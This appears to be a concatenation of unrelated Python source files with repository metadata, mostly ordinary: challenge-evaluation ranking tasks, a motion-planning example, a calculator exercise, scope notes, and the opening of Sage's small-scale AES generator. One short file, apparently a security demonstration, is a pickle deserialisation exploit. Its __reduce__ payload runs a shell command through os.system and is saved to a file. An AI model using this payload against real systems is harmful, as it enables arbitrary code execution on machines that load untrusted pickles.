Python
|
app/grandchallenge/evaluation/tasks.py
|
pushpanjalip/grand-challenge.org
|
607a30c9fe0e603b79f7b49dc9efeb48a484ebfc
|
[
"Apache-2.0"
] | null | null | null |
app/grandchallenge/evaluation/tasks.py
|
pushpanjalip/grand-challenge.org
|
607a30c9fe0e603b79f7b49dc9efeb48a484ebfc
|
[
"Apache-2.0"
] | null | null | null |
app/grandchallenge/evaluation/tasks.py
|
pushpanjalip/grand-challenge.org
|
607a30c9fe0e603b79f7b49dc9efeb48a484ebfc
|
[
"Apache-2.0"
] | null | null | null |
import uuid
from statistics import mean, median
from celery import shared_task
from django.apps import apps
from grandchallenge.evaluation.utils import Metric, rank_results
@shared_task
def set_evaluation_inputs(evaluation_pk):
"""
    Sets the inputs to the Evaluation for an algorithm submission.
    If all of the `AlgorithmEvaluation`s for this algorithm `Submission` are
    successful, this will set the inputs to the `Evaluation` job and schedule
    it. If any of the `AlgorithmEvaluation`s are unsuccessful, then the
`Evaluation` will be marked as Failed.
Parameters
----------
evaluation_pk
The primary key of the evaluation.Evaluation object
"""
Evaluation = apps.get_model( # noqa: N806
app_label="evaluation", model_name="Evaluation"
)
evaluation = Evaluation.objects.get(pk=evaluation_pk)
unsuccessful_jobs = evaluation.submission.algorithmevaluation_set.exclude(
status=Evaluation.SUCCESS
).count()
if unsuccessful_jobs:
evaluation.update_status(
status=evaluation.FAILURE,
output=(
f"The algorithm failed to execute on {unsuccessful_jobs} "
f"images."
),
)
else:
from grandchallenge.evaluation.serializers import (
AlgorithmEvaluationSerializer,
)
from grandchallenge.components.models import (
ComponentInterface,
ComponentInterfaceValue,
)
serializer = AlgorithmEvaluationSerializer(
evaluation.submission.algorithmevaluation_set.all(), many=True
)
interface = ComponentInterface.objects.get(
title="Predictions JSON File"
)
civ = ComponentInterfaceValue.objects.create(
interface=interface, value=serializer.data
)
evaluation.inputs.set([civ])
evaluation.signature.apply_async()
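# Hedged usage sketch (added example, not part of the original module): a helper
# like the one below is roughly how the task above would be queued once the
# per-image AlgorithmEvaluation jobs have reported back. The `evaluation`
# argument is a hypothetical Evaluation instance; only its pk crosses the broker
# and the task re-fetches the row itself.
def _queue_input_assignment(evaluation):
    # Celery shared tasks expose .delay()/.apply_async() for asynchronous dispatch.
    set_evaluation_inputs.delay(evaluation.pk)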
def filter_by_creators_most_recent(*, evaluations):
# Go through the evaluations and only pass through the most recent
# submission for each user
users_seen = set()
filtered_qs = []
for e in evaluations:
creator = e.submission.creator
if creator not in users_seen:
users_seen.add(creator)
filtered_qs.append(e)
return filtered_qs
def filter_by_creators_best(*, evaluations, ranks):
best_result_per_user = {}
for e in evaluations:
creator = e.submission.creator
try:
this_rank = ranks[e.pk]
except KeyError:
# This result was not ranked
continue
if creator not in best_result_per_user or (
this_rank < ranks[best_result_per_user[creator].pk]
):
best_result_per_user[creator] = e
return [r for r in best_result_per_user.values()]
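# Hedged toy illustration (added example, not from the original module) of how the
# two filters above behave. Real callers pass Django model instances ordered
# newest-first; the namedtuples below are hypothetical stand-ins exposing only the
# attributes the filters actually touch (`pk` and `submission.creator`).
from collections import namedtuple
_ToySub = namedtuple("_ToySub", "creator")
_ToyEval = namedtuple("_ToyEval", "pk submission")
def _filter_behaviour_demo():
    evals = [_ToyEval(1, _ToySub("alice")), _ToyEval(2, _ToySub("alice")), _ToyEval(3, _ToySub("bob"))]
    newest = filter_by_creators_most_recent(evaluations=evals)  # keeps pks 1 and 3
    best = filter_by_creators_best(evaluations=evals, ranks={1: 2, 2: 1, 3: 3})  # keeps pks 2 and 3
    return newest, best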
@shared_task # noqa: C901
def calculate_ranks(*, phase_pk: uuid.UUID): # noqa: C901
Phase = apps.get_model( # noqa: N806
app_label="evaluation", model_name="Phase"
)
Evaluation = apps.get_model( # noqa: N806
app_label="evaluation", model_name="Evaluation"
)
phase = Phase.objects.get(pk=phase_pk)
display_choice = phase.result_display_choice
score_method_choice = phase.scoring_method_choice
metrics = (
Metric(
path=phase.score_jsonpath,
reverse=(phase.score_default_sort == phase.DESCENDING),
),
*[
Metric(path=col["path"], reverse=col["order"] == phase.DESCENDING,)
for col in phase.extra_results_columns
],
)
if score_method_choice == phase.ABSOLUTE:
def score_method(x):
return list(x)[0]
elif score_method_choice == phase.MEAN:
score_method = mean
elif score_method_choice == phase.MEDIAN:
score_method = median
else:
raise NotImplementedError
valid_evaluations = (
Evaluation.objects.filter(
submission__phase=phase, published=True, status=Evaluation.SUCCESS,
)
.order_by("-created")
.select_related("submission__creator")
.prefetch_related("outputs__interface")
)
if display_choice == phase.MOST_RECENT:
valid_evaluations = filter_by_creators_most_recent(
evaluations=valid_evaluations
)
elif display_choice == phase.BEST:
all_positions = rank_results(
evaluations=valid_evaluations,
metrics=metrics,
score_method=score_method,
)
valid_evaluations = filter_by_creators_best(
evaluations=valid_evaluations, ranks=all_positions.ranks
)
final_positions = rank_results(
evaluations=valid_evaluations,
metrics=metrics,
score_method=score_method,
)
evaluations = Evaluation.objects.filter(submission__phase=phase)
_update_evaluations(
evaluations=evaluations, final_positions=final_positions
)
def _update_evaluations(*, evaluations, final_positions):
Evaluation = apps.get_model( # noqa: N806
app_label="evaluation", model_name="Evaluation"
)
for e in evaluations:
try:
rank = final_positions.ranks[e.pk]
rank_score = final_positions.rank_scores[e.pk]
rank_per_metric = final_positions.rank_per_metric[e.pk]
except KeyError:
# This result will be excluded from the display
rank = 0
rank_score = 0.0
rank_per_metric = {}
e.rank = rank
e.rank_score = rank_score
e.rank_per_metric = rank_per_metric
Evaluation.objects.bulk_update(
evaluations, ["rank", "rank_score", "rank_per_metric"]
)
@shared_task
def assign_evaluation_permissions(*, challenge_pk: uuid.UUID):
Evaluation = apps.get_model( # noqa: N806
app_label="evaluation", model_name="Evaluation"
)
for e in Evaluation.objects.filter(
submission__phase__challenge__id=challenge_pk
):
e.assign_permissions()
| 28.995215
| 79
| 0.649175
|
c55d39c751718cdb4e63aa3da65bf7a16d16bbdf
| 1,751
|
py
|
Python
|
pomp/example_problems/doubleintegrator.py
|
Aand1/pyOptimalMotionPlanning
|
5f06b4331149b86538e1ecfa7ccb9915c8cb510a
|
[
"Apache-2.0"
] | null | null | null |
pomp/example_problems/doubleintegrator.py
|
Aand1/pyOptimalMotionPlanning
|
5f06b4331149b86538e1ecfa7ccb9915c8cb510a
|
[
"Apache-2.0"
] | null | null | null |
pomp/example_problems/doubleintegrator.py
|
Aand1/pyOptimalMotionPlanning
|
5f06b4331149b86538e1ecfa7ccb9915c8cb510a
|
[
"Apache-2.0"
] | 1
|
2021-07-07T16:15:52.000Z
|
2021-07-07T16:15:52.000Z
|
from OpenGL.GL import *
from geometric import *
from ..spaces.objective import *
from ..spaces.statespace import *
from ..spaces.configurationspace import *
from ..spaces.edgechecker import *
from ..spaces.metric import *
from ..planners.problem import PlanningProblem
class DoubleIntegratorVisualizer:
def __init__(self,workspace):
self.base = workspace
def toScreen(self,q):
return q[0],q[1]
def toState(self,x,y):
return (x,y,0,0)
def drawObstaclesGL(self):
self.base.drawObstaclesGL()
def drawVerticesGL(self,qs):
self.base.drawVerticesGL(qs)
def drawRobotGL(self,q):
glColor3f(0,0,1)
glPointSize(7.0)
self.drawVerticesGL([q])
l = 0.05
glBegin(GL_LINES)
glVertex2f(q[0],q[1])
glVertex2f(q[0]+l*q[2],q[1]+l*q[3])
glEnd()
def drawGoalGL(self,goal):
self.base.drawGoalGL(goal)
def drawInterpolatorGL(self,interpolator):
self.base.drawInterpolatorGL(interpolator)
def doubleIntegratorTest():
cspace = Geometric2DCSpace()
#cspace.addObstacle(Circle(0.5,0.4,0.39))
vspace = BoxConfigurationSpace([-1,-1],[1,1])
aspace = BoxConfigurationSpace([-5,-5],[5,5])
start = [0.06,0.25,0,0]
goal = [0.94,0.25,0,0]
objective = TimeObjectiveFunction()
goalRadius = 0.2
controlSpace = CVControlSpace(cspace,vspace,aspace,dt=0.05,dtmax=0.5)
return PlanningProblem(controlSpace,start,goal,
objective=objective,
visualizer=DoubleIntegratorVisualizer(cspace),
goalRadius = goalRadius,
euclidean = True)
| 30.189655
| 74
| 0.606511
|
95ee3db30911dcd29b4bb789a3349024997a81f7
| 391
|
py
|
Python
|
poshmon-tools/font.py
|
super-phreak/poshmon
|
cca861b0d6cb02fe4969c2dc099cbff5bae38134
|
[
"MIT"
] | 1
|
2021-11-18T03:00:13.000Z
|
2021-11-18T03:00:13.000Z
|
poshmon-tools/font.py
|
super-phreak/poshmon
|
cca861b0d6cb02fe4969c2dc099cbff5bae38134
|
[
"MIT"
] | null | null | null |
poshmon-tools/font.py
|
super-phreak/poshmon
|
cca861b0d6cb02fe4969c2dc099cbff5bae38134
|
[
"MIT"
] | null | null | null |
#Needed because powershell ConvertFrom-Json is dumb and treats 'A' and 'a' as the same.
from pokedata import Sprite
class Font:
def __init__(self,addr,char):
self.addr = addr
self.char = char
self.sprite = Sprite.decode1BPP(addr,1,1)
def to_json(self):
return {
'char' : self.char,
'sprite' : self.sprite.to_json()
}
| 26.066667
| 87
| 0.598465
|
bb29f054b294fe2c02496fc64ce65a82f11bf2bb
| 1,027
|
py
|
Python
|
Mundo 2 - Estruturas de Controle/ex059.py
|
diegomcosta/Curso-em-Video-Python
|
3f91b27390b90b686547931d4b1116d1a801cac6
|
[
"MIT"
] | null | null | null |
Mundo 2 - Estruturas de Controle/ex059.py
|
diegomcosta/Curso-em-Video-Python
|
3f91b27390b90b686547931d4b1116d1a801cac6
|
[
"MIT"
] | null | null | null |
Mundo 2 - Estruturas de Controle/ex059.py
|
diegomcosta/Curso-em-Video-Python
|
3f91b27390b90b686547931d4b1116d1a801cac6
|
[
"MIT"
] | null | null | null |
n1 = int(input("Primeiro valor: "))
n2 = int(input("Segundo valor: "))
op = maior = 0
while (op != 5):
print(" [1] somar")
print(" [2] multiplicar")
print(" [3] maior")
print(" [4] novos números")
print(" [5] sair do programa")
op = int(input(">>>>> Qual é a sua opção? "))
if (op < 1 or op > 5):
print("Opção inválida. Tente novamente")
else:
if (op == 1):
print(f"A soma entre {n1} e {n2} é {n1 +n2}")
elif (op == 2):
print(f"O resultado de {n1} X {n2} é {n1 * n2}")
elif (op == 3):
maior = n1
if (n2 > n1):
maior = n2
print(f"Entre {n1} e {n2} o maior valor é {maior}")
elif (op == 4):
print("Informe os números novamente:")
n1 = int(input("Primeiro valor: "))
n2 = int(input("Segundo valor: "))
elif (op == 5):
print("Finalizando...")
print("=-=" * 10)
print("Fim do programa! Volte sempre!")
| 31.121212
| 63
| 0.462512
|
88f5aee4dbf416d259f2392c712b765b371a5860
| 281
|
py
|
Python
|
scripts/pickle/3pickle.py
|
trailofbits/not-slithering-anywhere
|
250a7d47762bfd504195a450ce49c146a282323c
|
[
"Apache-2.0"
] | 11
|
2020-08-06T19:18:31.000Z
|
2022-02-25T01:50:04.000Z
|
scripts/pickle/3pickle.py
|
Hinge/not-slithering-anywhere
|
6f9a263e834ce1b863d33dbb80994eb6a66a5f5d
|
[
"Apache-2.0"
] | null | null | null |
scripts/pickle/3pickle.py
|
Hinge/not-slithering-anywhere
|
6f9a263e834ce1b863d33dbb80994eb6a66a5f5d
|
[
"Apache-2.0"
] | 3
|
2021-01-07T16:55:02.000Z
|
2022-02-25T01:50:10.000Z
|
import pickle
import os
class F(object):
def __reduce__(self):
return (os.system, (('/usr/bin/id > dump',)))
f = F()
payload = pickle.dumps(f)
print(payload)
pickle.loads(payload)
with open('badpickle.p', 'wb') as fh:
pickle.dump(f, fh, pickle.HIGHEST_PROTOCOL)
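# Hedged companion sketch (added example, not from the original script): the payload
# above works because pickle.loads resolves and calls os.system via __reduce__ during
# deserialisation. The standard mitigation, following the "Restricting Globals" recipe
# in the Python docs, is a restricted Unpickler that whitelists what find_class may return.
import builtins
import io
class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Allow only a small set of harmless builtins; refuse everything else.
        if module == "builtins" and name in {"range", "complex", "set", "frozenset", "slice"}:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))
def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()
# restricted_loads(payload) raises UnpicklingError instead of running /usr/bin/id.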
| 18.733333
| 53
| 0.658363
|
9a633dd4469a528a405795fc606d3ac0073406c4
| 1,820
|
py
|
Python
|
.history/my_classes/ScopesClosuresAndDecorators/nonLocalScopes_20210710221612.py
|
minefarmer/deep-Dive-1
|
b0675b853180c5b5781888266ea63a3793b8d855
|
[
"Unlicense"
] | null | null | null |
.history/my_classes/ScopesClosuresAndDecorators/nonLocalScopes_20210710221612.py
|
minefarmer/deep-Dive-1
|
b0675b853180c5b5781888266ea63a3793b8d855
|
[
"Unlicense"
] | null | null | null |
.history/my_classes/ScopesClosuresAndDecorators/nonLocalScopes_20210710221612.py
|
minefarmer/deep-Dive-1
|
b0675b853180c5b5781888266ea63a3793b8d855
|
[
"Unlicense"
] | null | null | null |
""" NonLocal Scopes
Inner Functions
We can define functions from inside another function:
"""
def outer_func():
# some code
# this is an example of a nested function
def inner_func():
# some code
inner_func()
outer_func()
"""
Both functions have access to the global and built-in scopes as well as their respective local scopes
But the inner function also has access to its enclosing scope - the scope of the outer function
That scope is neither local (to inner_func) nor global - it is called a non local scope
Referencing variables from the enclosing scope
Consider this example
module1.py
a = 10
def outer_func():
print(a)
outer_func()
When we call outer_func, Python sees the reference to a and finds it in the enclosing (global) scope.
Consider this example
module1.py
def outer_func():
a = 10
def inner_func():
print(a)
inner_func()
outer_func()
When we call outer_func, inner_func is created and called
When inner_func is called, Python does not find a in the local(inner_func) scope
So it looks for it in the enclosing scope, in this case the scope of the outer func
Since it does not find it there either, it looks in the enclosing (global) scope
Modifying global variables
We saw how to use the global keyword in order to modify a global variable within a nested scope.
a = 10
def outer_func():
global a
a = 1000
outer_func()
print(a) # 1000
We can of course do the same thing from within a nested function
def outer_func2():
def inner_func():
global a
        a = 'hello'
inner_func()
outer_func2()
print(a) # hello
Modifying nonlocal variables
Can we modify a variable defined in the outer (nonlocal) scope?
def outer_func():
    x = 'hello'
    def inner_func():
        x = 'python'  # without `nonlocal`, this just creates a new local variable
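Using the `nonlocal` keyword we can tell Python to rebind x in the enclosing scope
instead (an added sketch, not part of the original note):
def outer_func():
    x = 'hello'
    def inner_func():
        nonlocal x
        x = 'python'
    inner_func()
    print(x)  # python -> the enclosing x was modified
outer_func()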
"""
| 19.569892
| 101
| 0.684066
|
1a0cd992f7907b50ee40750e041fcf5a257cd960
| 104
|
py
|
Python
|
enthought/naming/pyfs_object_factory.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 3
|
2016-12-09T06:05:18.000Z
|
2018-03-01T13:00:29.000Z
|
enthought/naming/pyfs_object_factory.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 1
|
2020-12-02T00:51:32.000Z
|
2020-12-02T08:48:55.000Z
|
enthought/naming/pyfs_object_factory.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | null | null | null |
# proxy module
from __future__ import absolute_import
from apptools.naming.pyfs_object_factory import *
| 26
| 49
| 0.855769
|
dc7fb771d0bc966f1d7cc6f74f7c4a0887dfa647
| 123,706
|
py
|
Python
|
src/sage/crypto/mq/sr.py
|
vbraun/sage
|
07d6c37d18811e2b377a9689790a7c5e24da16ba
|
[
"BSL-1.0"
] | 3
|
2016-06-19T14:48:31.000Z
|
2022-01-28T08:46:01.000Z
|
src/sage/crypto/mq/sr.py
|
vbraun/sage
|
07d6c37d18811e2b377a9689790a7c5e24da16ba
|
[
"BSL-1.0"
] | null | null | null |
src/sage/crypto/mq/sr.py
|
vbraun/sage
|
07d6c37d18811e2b377a9689790a7c5e24da16ba
|
[
"BSL-1.0"
] | 7
|
2021-11-08T10:01:59.000Z
|
2022-03-03T11:25:52.000Z
|
r"""
Small Scale Variants of the AES (SR) Polynomial System Generator
Sage supports polynomial system generation for small scale (and full
scale) AES variants over `\GF{2}` and `\GF{2^e}`. Also, Sage supports
both the specification of SR as given in the papers [CMR2005]_ and
[CMR2006]_ and a variant of SR* which is equivalent to AES.
SR is a family of parameterizable variants of the AES suitable as a
framework for comparing different cryptanalytic techniques that can be
brought to bear on the AES. It is different from
:class:`Mini-AES <sage.crypto.block_cipher.miniaes.MiniAES>`, whose
purpose is as a teaching tool to help beginners understand the basic
structure and working of the full AES.
AUTHORS:
- Martin Albrecht (2008,2009-01): usability improvements
- Martin Albrecht (2007-09): initial version
- Niles Johnson (2010-08): (:trac:`3893`) ``random_element()`` should pass on ``*args`` and ``**kwds``.
EXAMPLES:
We construct SR(1,1,1,4) and study its properties.
::
sage: sr = mq.SR(1, 1, 1, 4)
``n`` is the number of rounds, ``r`` the number of rows in the
state array, ``c`` the number of columns in the state array, and ``e`` the
degree of the underlying field.
::
sage: sr.n, sr.r, sr.c, sr.e
(1, 1, 1, 4)
By default, variables are ordered in reverse of the order in which they appear, e.g.::
sage: print(sr.R.repr_long())
Polynomial Ring
Base Ring : Finite Field in a of size 2^4
Size : 20 Variables
Block 0 : Ordering : deglex
Names : k100, k101, k102, k103, x100, x101, x102, x103, w100, w101, w102, w103, s000, s001, s002, s003, k000, k001, k002, k003
However, this can be prevented by passing in ``reverse_variables=False`` to the constructor.
For SR(1, 1, 1, 4) the ``ShiftRows`` matrix isn't that interesting.::
sage: sr.ShiftRows
[1 0 0 0]
[0 1 0 0]
[0 0 1 0]
[0 0 0 1]
Also, the ``MixColumns`` matrix is the identity matrix.::
sage: sr.MixColumns
[1 0 0 0]
[0 1 0 0]
[0 0 1 0]
[0 0 0 1]
``Lin``, however, is not the identity matrix.::
sage: sr.Lin
[ a^2 + 1 1 a^3 + a^2 a^2 + 1]
[ a a 1 a^3 + a^2 + a + 1]
[ a^3 + a a^2 a^2 1]
[ 1 a^3 a + 1 a + 1]
``M`` and ``Mstar`` are identical for SR(1, 1, 1, 4)::
sage: sr.M
[ a^2 + 1 1 a^3 + a^2 a^2 + 1]
[ a a 1 a^3 + a^2 + a + 1]
[ a^3 + a a^2 a^2 1]
[ 1 a^3 a + 1 a + 1]
::
sage: sr.Mstar
[ a^2 + 1 1 a^3 + a^2 a^2 + 1]
[ a a 1 a^3 + a^2 + a + 1]
[ a^3 + a a^2 a^2 1]
[ 1 a^3 a + 1 a + 1]
However, for larger instances of SR Mstar is not equal to M::
sage: sr = mq.SR(10,4,4,8)
sage: sr.Mstar == ~sr.MixColumns * sr.M
True
We can compute a Groebner basis for the ideals spanned by SR
instances to recover all solutions to the system.::
sage: sr = mq.SR(1,1,1,4, gf2=True, polybori=True)
sage: K = sr.base_ring()
sage: a = K.gen()
sage: K = [a]
sage: P = [1]
sage: F,s = sr.polynomial_system(P=P, K=K)
sage: F.groebner_basis()
[k100, k101 + 1, k102, k103 + k003,
x100 + 1, x101 + k003 + 1, x102 + k003 + 1,
x103 + k003, w100, w101, w102 + 1, w103 + k003 + 1,
s000 + 1, s001 + k003, s002 + k003, s003 + k003 + 1,
k000, k001, k002 + 1]
Note that the order of ``k000``, ``k001``, ``k002`` and ``k003`` is
little endian. Thus the result ``k002 + 1, k001, k000`` indicates that
the key is either `a` or `a+1`. We can verify that both keys encrypt P
to the same ciphertext::
sage: sr(P,[a])
[0]
sage: sr(P,[a+1])
[0]
All solutions can easily be recovered using the variety function for ideals.::
sage: I = F.ideal()
sage: for V in I.variety():
....: for k,v in sorted(V.items()):
....: print("{} {}".format(k, v))
....: print("\n")
k003 0
k002 1
k001 0
k000 0
s003 1
s002 0
s001 0
s000 1
w103 1
w102 1
w101 0
w100 0
x103 0
x102 1
x101 1
x100 1
k103 0
k102 0
k101 1
k100 0
<BLANKLINE>
k003 1
k002 1
k001 0
k000 0
s003 0
s002 1
s001 1
s000 1
w103 0
w102 1
w101 0
w100 0
x103 1
x102 0
x101 0
x100 1
k103 1
k102 0
k101 1
k100 0
We can also verify the correctness of the variety by evaluating all
ideal generators on all points.::
sage: for V in I.variety():
....: for f in I.gens():
....: if f.subs(V) != 0:
....: print("epic fail")
Note that the S-Box object for SR can be constructed with a call to ``sr.sbox()``::
sage: sr = mq.SR(1,1,1,4, gf2=True, polybori=True)
sage: S = sr.sbox()
For example, we can now study the difference distribution matrix of ``S``::
sage: S.difference_distribution_matrix()
[16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]
[ 0 2 2 2 2 0 0 0 2 0 0 0 2 4 0 0]
[ 0 2 0 4 2 2 2 0 0 2 0 0 0 0 0 2]
[ 0 2 4 0 0 2 0 0 2 2 0 2 0 0 2 0]
[ 0 0 2 0 4 2 0 0 0 0 2 0 2 0 2 2]
[ 0 0 0 2 0 0 0 2 4 2 0 0 2 0 2 2]
[ 0 4 0 0 0 2 0 2 0 2 2 0 2 2 0 0]
[ 0 2 0 0 0 0 2 0 0 0 0 2 4 2 2 2]
[ 0 2 2 0 0 0 2 2 2 0 2 0 0 0 0 4]
[ 0 0 2 2 0 0 0 0 0 2 2 4 0 2 0 2]
[ 0 0 2 0 2 0 2 2 0 4 0 2 2 0 0 0]
[ 0 0 0 0 2 0 2 0 2 2 4 0 0 2 2 0]
[ 0 0 0 2 0 4 2 0 2 0 2 2 2 0 0 0]
[ 0 0 0 0 2 2 0 4 2 0 0 2 0 2 0 2]
[ 0 0 2 2 0 2 4 2 0 0 0 0 0 2 2 0]
[ 0 2 0 2 2 0 0 2 0 0 2 2 0 0 4 0]
or use ``S`` to find alternative polynomial representations for the S-Box.::
sage: S.polynomials(degree=3)
[x0*x1 + x1*x2 + x0*x3 + x0*y2 + x1 + y0 + y1 + 1,
x0*x1 + x0*x2 + x0*y0 + x0*y1 + x0*y2 + x1 + x2 + y0 + y1 + y2,
x0*x1 + x0*x2 + x0*x3 + x1*x3 + x0*y0 + x1*y0 + x0*y1 + x0*y3,
x0*x1 + x0*x2 + x0*x3 + x1*x3 + x0*y0 + x1*y1 + x0*y3 + x1 + y0 + y1 + 1,
x0*x1 + x0*x2 + x0*y2 + x1*y2 + x0*y3 + x0 + x1,
x0*x3 + x1*x3 + x0*y1 + x0*y2 + x1*y3 + x0 + x1 + x2 + x3 + y0 + y1 + y3 + 1,
x0*x1 + x1*x3 + x2*x3 + x0*y0 + x0*y2 + x0*y3 + x2 + y0 + y3,
x0*x1 + x0*x2 + x0*x3 + x1*x3 + x2*y0 + x0*y2 + x0 + x2 + x3 + y3,
x0*x3 + x1*x3 + x0*y0 + x2*y1 + x0*y2 + x3 + y3,
x0*x1 + x0*x2 + x0*y0 + x0*y1 + x2*y2 + x0*y3 + x1 + y0 + y1 + 1,
x0*x3 + x1*x3 + x0*y0 + x0*y1 + x0*y3 + x2*y3 + y0 + y3,
x0*x1 + x0*x2 + x3*y0 + x0*y1 + x0*y3 + y0,
x0*y0 + x0*y1 + x3*y1 + x0 + x2 + y0 + y3,
x0*y0 + x3*y2 + y0,
x0*x1 + x0*x2 + x0*x3 + x1*x3 + x0*y0 + x0*y2 + x3*y3 + y0,
x0*x2 + x0*x3 + x0*y1 + y0*y1 + x0*y3 + x2 + x3 + y3,
x0*x2 + x0*y0 + y0*y2 + x0*y3 + x0 + y0,
x0*x1 + x0*x2 + x1*x3 + x0*y2 + y0*y3 + y0,
x0*x1 + x0*y0 + y1*y2 + x0*y3 + x1 + x2 + y0 + 1,
x0*x2 + x1*x3 + x0*y1 + x0*y2 + x0*y3 + y1*y3 + x0 + y0 + y3,
x0*x1 + x0*x2 + x0*x3 + x0*y1 + x0*y2 + x0*y3 + y2*y3 + x0 + x1 + x2 + x3 + y1 + y3 + 1,
x0*x1*x2 + x0*x3 + x0*y0 + x0*y1 + x0*y2 + x0,
x0*x1*x3 + x0*x2 + x0*x3 + x0*y1 + x0*y3 + x0,
x0*x1*y0 + x0*x1 + x0*y0 + x0,
x0*x1*y1,
x0*x1*y2 + x0*x2 + x0*y2 + x0*y3 + x0,
x0*x1*y3 + x0*x1 + x0*x3 + x0*y0 + x0*y1 + x0*y2 + x0,
x0*x2*x3 + x0*x1 + x0*x3 + x0*y1 + x0*y2 + x0*y3 + x0,
x0*x2*y0 + x0*x1 + x0*x2 + x0*x3 + x0*y1 + x0*y2,
x0*x2*y1 + x0*x2 + x0*x3 + x0*y0 + x0*y1 + x0*y2 + x0,
x0*x2*y2 + x0*x2 + x0*y3 + x0,
x0*x2*y3 + x0*x2 + x0*y3 + x0,
x0*x3*y0 + x0*x1 + x0*x2 + x0*y0 + x0*y1 + x0*y3,
x0*x3*y1 + x0*x2 + x0*y1 + x0*y3 + x0,
x0*x3*y2,
x0*x3*y3 + x0*x1 + x0*y1 + x0*y2 + x0*y3 + x0,
x0*y0*y1 + x0*y1,
x0*y0*y2 + x0*x2 + x0*y3 + x0,
x0*y0*y3 + x0*x1 + x0*x3 + x0*y0 + x0*y1 + x0*y2 + x0*y3 + x0,
x0*y1*y2 + x0*x2 + x0*y3 + x0,
x0*y1*y3 + x0*x3 + x0*y0 + x0*y2 + x0*y3,
x0*y2*y3 + x0*y2,
x1*x2*x3 + x0*x1 + x1*x3 + x0*y0 + x0*y1 + x2 + x3 + y3,
x1*x2*y0 + x0*x1 + x1*x3 + x0*y0 + x0*y1 + x2 + x3 + y3,
x1*x2*y1 + x0*x1 + x1*x3 + x0*y0 + x1 + x2 + x3 + y0 + y1 + y3 + 1,
x1*x2*y2 + x0*x1 + x0*y0 + x0*y1 + x0 + x1 + y0 + y1 + 1,
x1*x2*y3 + x0*x1 + x1*x3 + x0*y0 + x1 + x2 + x3 + y0 + y1 + y3 + 1,
x1*x3*y0 + x0*x1 + x0*x2 + x0*x3 + x1*x3 + x0*y0 + x0*y1 + x0*y3,
x1*x3*y1 + x0*x2 + x0*x3 + x0*y3 + x2 + x3 + y3,
x1*x3*y2 + x0*x2 + x0*x3 + x1*x3 + x0*y1 + x0*y3 + x0,
x1*x3*y3 + x0*x1 + x0*x2 + x0*x3 + x0*y0 + x0*y1 + x0*y3,
x1*y0*y1 + x0*x2 + x0*x3 + x0*y3 + x2 + x3 + y3,
x1*y0*y2 + x0*x2 + x0*x3 + x1*x3 + x0*y1 + x0*y3 + x0,
x1*y0*y3,
x1*y1*y2 + x0*x1 + x0*x2 + x0*x3 + x1*x3 + x0*y0 + x0*y3 + x1 + y0 + y1 + 1,
x1*y1*y3 + x0*x1 + x1*x3 + x0*y0 + x1 + x2 + x3 + y0 + y1 + y3 + 1,
x1*y2*y3 + x0*x1 + x0*x2 + x1*x3 + x0*y0 + x0*y2 + x0*y3 + x0 + x1 + x2 + x3 + y0 + y1 + y3 + 1,
x2*x3*y0 + x0*x1 + x0*x3 + x1*x3 + x0*y2 + x0*y3 + x2 + x3 + y3,
x2*x3*y1 + x0*y1 + x0*y2 + x0*y3 + x3 + y0,
x2*x3*y2 + x1*x3 + x0*y1 + x0 + x2 + x3 + y3,
x2*x3*y3,
x2*y0*y1 + x0*x2 + x0*x3 + x0*y0 + x0*y1 + x0*y2 + x0,
x2*y0*y2 + x0*x2 + x1*x3 + x0*y1 + x0*y3 + x2 + x3 + y3,
x2*y0*y3 + x0*x2 + x0*y3 + x0,
x2*y1*y2 + x0*x1 + x0*x2 + x1*x3 + x0*y0 + x0*y3 + x0 + x1 + x2 + x3 + y0 + y1 + y3 + 1,
x2*y1*y3 + x0*x3 + x1*x3 + x0*y0 + x0*y1 + x0*y3 + y0 + y3,
x2*y2*y3 + x0*x1 + x0*x2 + x1*x3 + x0*y0 + x0*y3 + x0 + x1 + x2 + x3 + y0 + y1 + y3 + 1,
x3*y0*y1 + x0*x3 + x0*y1 + x0 + x2 + x3 + y3,
x3*y0*y2 + x0*y0 + y0,
x3*y0*y3 + x1*x3 + x0*y1 + x0*y2 + x0*y3 + y0,
x3*y1*y2 + x0*x2 + x0*x3 + x0*y3 + x2 + x3 + y3,
x3*y1*y3 + x0*x2 + x0*x3 + x0*y0 + x0*y2 + x0,
x3*y2*y3 + x0*x2 + x0*x3 + x1*x3 + x0*y0 + x0*y1 + x0*y3 + x0 + y0,
y0*y1*y2 + x0*x3 + x0 + x2 + x3 + y3,
y0*y1*y3 + x0*x3 + x0*y0 + x0*y2 + x0*y3,
y0*y2*y3 + x0*x3 + x1*x3 + x0*y0 + x0*y1 + y0,
y1*y2*y3 + x0*x1 + x0*x2 + x1*x3 + x0*y0 + x0*y3 + x0 + x1 + x2 + x3 + y0 + y1 + y3 + 1]
sage: S.interpolation_polynomial()
(a^2 + 1)*x^14 + x^13 + (a^3 + a^2)*x^11 + (a^2 + 1)*x^7 + a^2 + a
The :class:`SR_gf2_2` class gives an example of how to use alternative polynomial
representations of the S-Box for the construction of polynomial systems.
TESTS::
sage: sr == loads(dumps(sr))
True
REFERENCES:
- [CMR2005]_
- [CMR2006]_
- [MR2002]_
"""
# python3
from __future__ import division, print_function, absolute_import
from six.moves import range
from six import integer_types
from sage.rings.finite_rings.finite_field_constructor import FiniteField as GF
from sage.rings.integer_ring import ZZ
from sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing, BooleanPolynomialRing_constructor as BooleanPolynomialRing
from sage.matrix.matrix import is_Matrix
from sage.matrix.constructor import Matrix, random_matrix
from sage.matrix.matrix_space import MatrixSpace
from sage.misc.misc import get_verbose
from sage.misc.flatten import flatten
from sage.modules.vector_modn_dense import Vector_modn_dense
from sage.rings.polynomial.multi_polynomial_sequence import PolynomialSequence
from .mpolynomialsystemgenerator import MPolynomialSystemGenerator
from sage.rings.polynomial.term_order import TermOrder
from sage.structure.richcmp import richcmp_not_equal, rich_to_bool, op_LT
def SR(n=1, r=1, c=1, e=4, star=False, **kwargs):
